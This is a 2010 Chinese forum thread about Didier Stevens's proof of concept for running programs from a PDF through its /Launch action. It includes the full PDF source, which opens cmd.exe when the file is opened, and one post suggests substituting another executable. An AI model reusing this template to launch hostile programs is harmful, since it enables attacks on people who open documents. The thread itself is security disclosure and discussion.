不通过漏洞也可利用PDF执行恶意程序

wayne

安全研究人员Didier Stevens在本周发表一概念性验证程序，展示如何通过Adobe Reader的功能，而不必透过任何安全漏洞，就可在PDF文件中嵌入可执行程序。 Stevens所设计的PDF档案夹带了一个可执行程序，一旦使用者开启该PDF文件，就会启动所嵌入的可执行程序，虽然Adobe Reader会跳出一个警告窗口，提醒用户此一程序可能是恶意软件，但Stevens进一步发现他能够修改警告窗口内的档案描述文字，因此更可藉由社会工程学以欺诈用户允许该文件的执行。 Stevens强调，他所利用的并不是Adobe Reader的安全漏洞，而是由PDF语言的规格衍生而来。 对于Stevens的发现，F-Secure的首席执行官Mikko Hypponen表示，PDF文件格式的规格显示PDF允许用户嵌入各式内容，包括影片、声音、3D对象，亦可启动应用程序及JavaScript。Hypponen质疑用户为什么需要这些功能，并揶揄PDF有这么多规格难怪启动Adobe Reader或加载所有插件需要一点时间，而且不意外的，Adobe Reader会定期出现安全问题。 Stevens说，唯一可阻止程序执行的是Adobe Reader跳出的警告窗口，另一PDF阅读工具Foxit Reader也受到影响，但因该装置完全不会警告用户就径自执行程序，因此问题更为严重。 Hypponen则建议用户不要把网络上的PDF文件下载到个人计算机上，而是透过Google Docs等云端服务开启，另外也提醒使用者可以采用较冷门的PDF阅读工具以避免招惹黑客攻击。 来源：http://www.cnbeta.com/articles/107639.htm

wayne

哈哈，我用的是pdf-Xchange，很强大，但非主流，谁要是感兴趣，可以用Adobe打开这个zip里面的 pdf体验一下： http://didierstevens.com/files/data/launch-action-cmd.zip 参考资源： http://software.solidot.org/article.pl?sid=10/04/01/0043252

好地方

4月1日吧?

wayne

我怨啊，

qianyb

我开始也以为是真的，过来想想4.1才保留怀疑意见的

gxqcn

我怨啊， wayne 发表于 2010-4-2 09:14

是怨？还是冤？

qianyb

应该都有吧，呵呵

wayne

这信息是真的， 我是既冤又怨啊 IE，Adobe reader ，Adobe flash，是非常 有名的漏洞王。 这是那个zip文件里的pdf的源码，你用文本阅读器就可以打开，内容如下：

2. %PDF-1.1
4. 1 0 obj
5. <<
6. /Type /Catalog
7. /Outlines 2 0 R
8. /Pages 3 0 R
9. /OpenAction 8 0 R
10. >>
11. endobj
13. 2 0 obj
14. <<
15. /Type /Outlines
16. /Count 0
17. >>
18. endobj
20. 3 0 obj
21. <<
22. /Type /Pages
23. /Kids [4 0 R]
24. /Count 1
25. >>
26. endobj
28. 4 0 obj
29. <<
30. /Type /Page
31. /Parent 3 0 R
32. /MediaBox [0 0 612 792]
33. /Contents 5 0 R
34. /Resources
35. << /ProcSet 6 0 R
36. /Font << /F1 7 0 R >>
37. >>
38. >>
39. endobj
41. 5 0 obj
42. << /Length 46 >>
43. stream
44. BT
45. /F1 24 Tf
46. 100 700 Td
47. (Hello World)Tj
48. ET
49. endstream
50. endobj
52. 6 0 obj
53. [/PDF /Text]
54. endobj
56. 7 0 obj
57. <<
58. /Type /Font
59. /Subtype /Type1
60. /Name /F1
61. /BaseFont /Helvetica
62. /Encoding /MacRomanEncoding
63. >>
64. endobj
66. 8 0 obj
67. <<
68. /Type /Action
69. /S /Launch
70. /Win
71. <<
72. /F (cmd.exe)
73. >>
74. >>
75. endobj
77. xref
78. 0 9
79. 0000000000 65535 f
80. 0000000012 00000 n
81. 0000000109 00000 n
82. 0000000165 00000 n
83. 0000000234 00000 n
84. 0000000401 00000 n
85. 0000000505 00000 n
86. 0000000662 00000 n
87. trailer
88. <<
89. /Size 9
90. /Root 1 0 R
91. >>
92. startxref
93. 751
94. %%EOF

复制代码

gxqcn

用 ADOBE READER 9.3.1 打开，弹出如下对话框：

wayne

这个只是演示程序。 试想，如果我把8楼源码里的71行改成其他的可执行文件，那会是什么情况呢？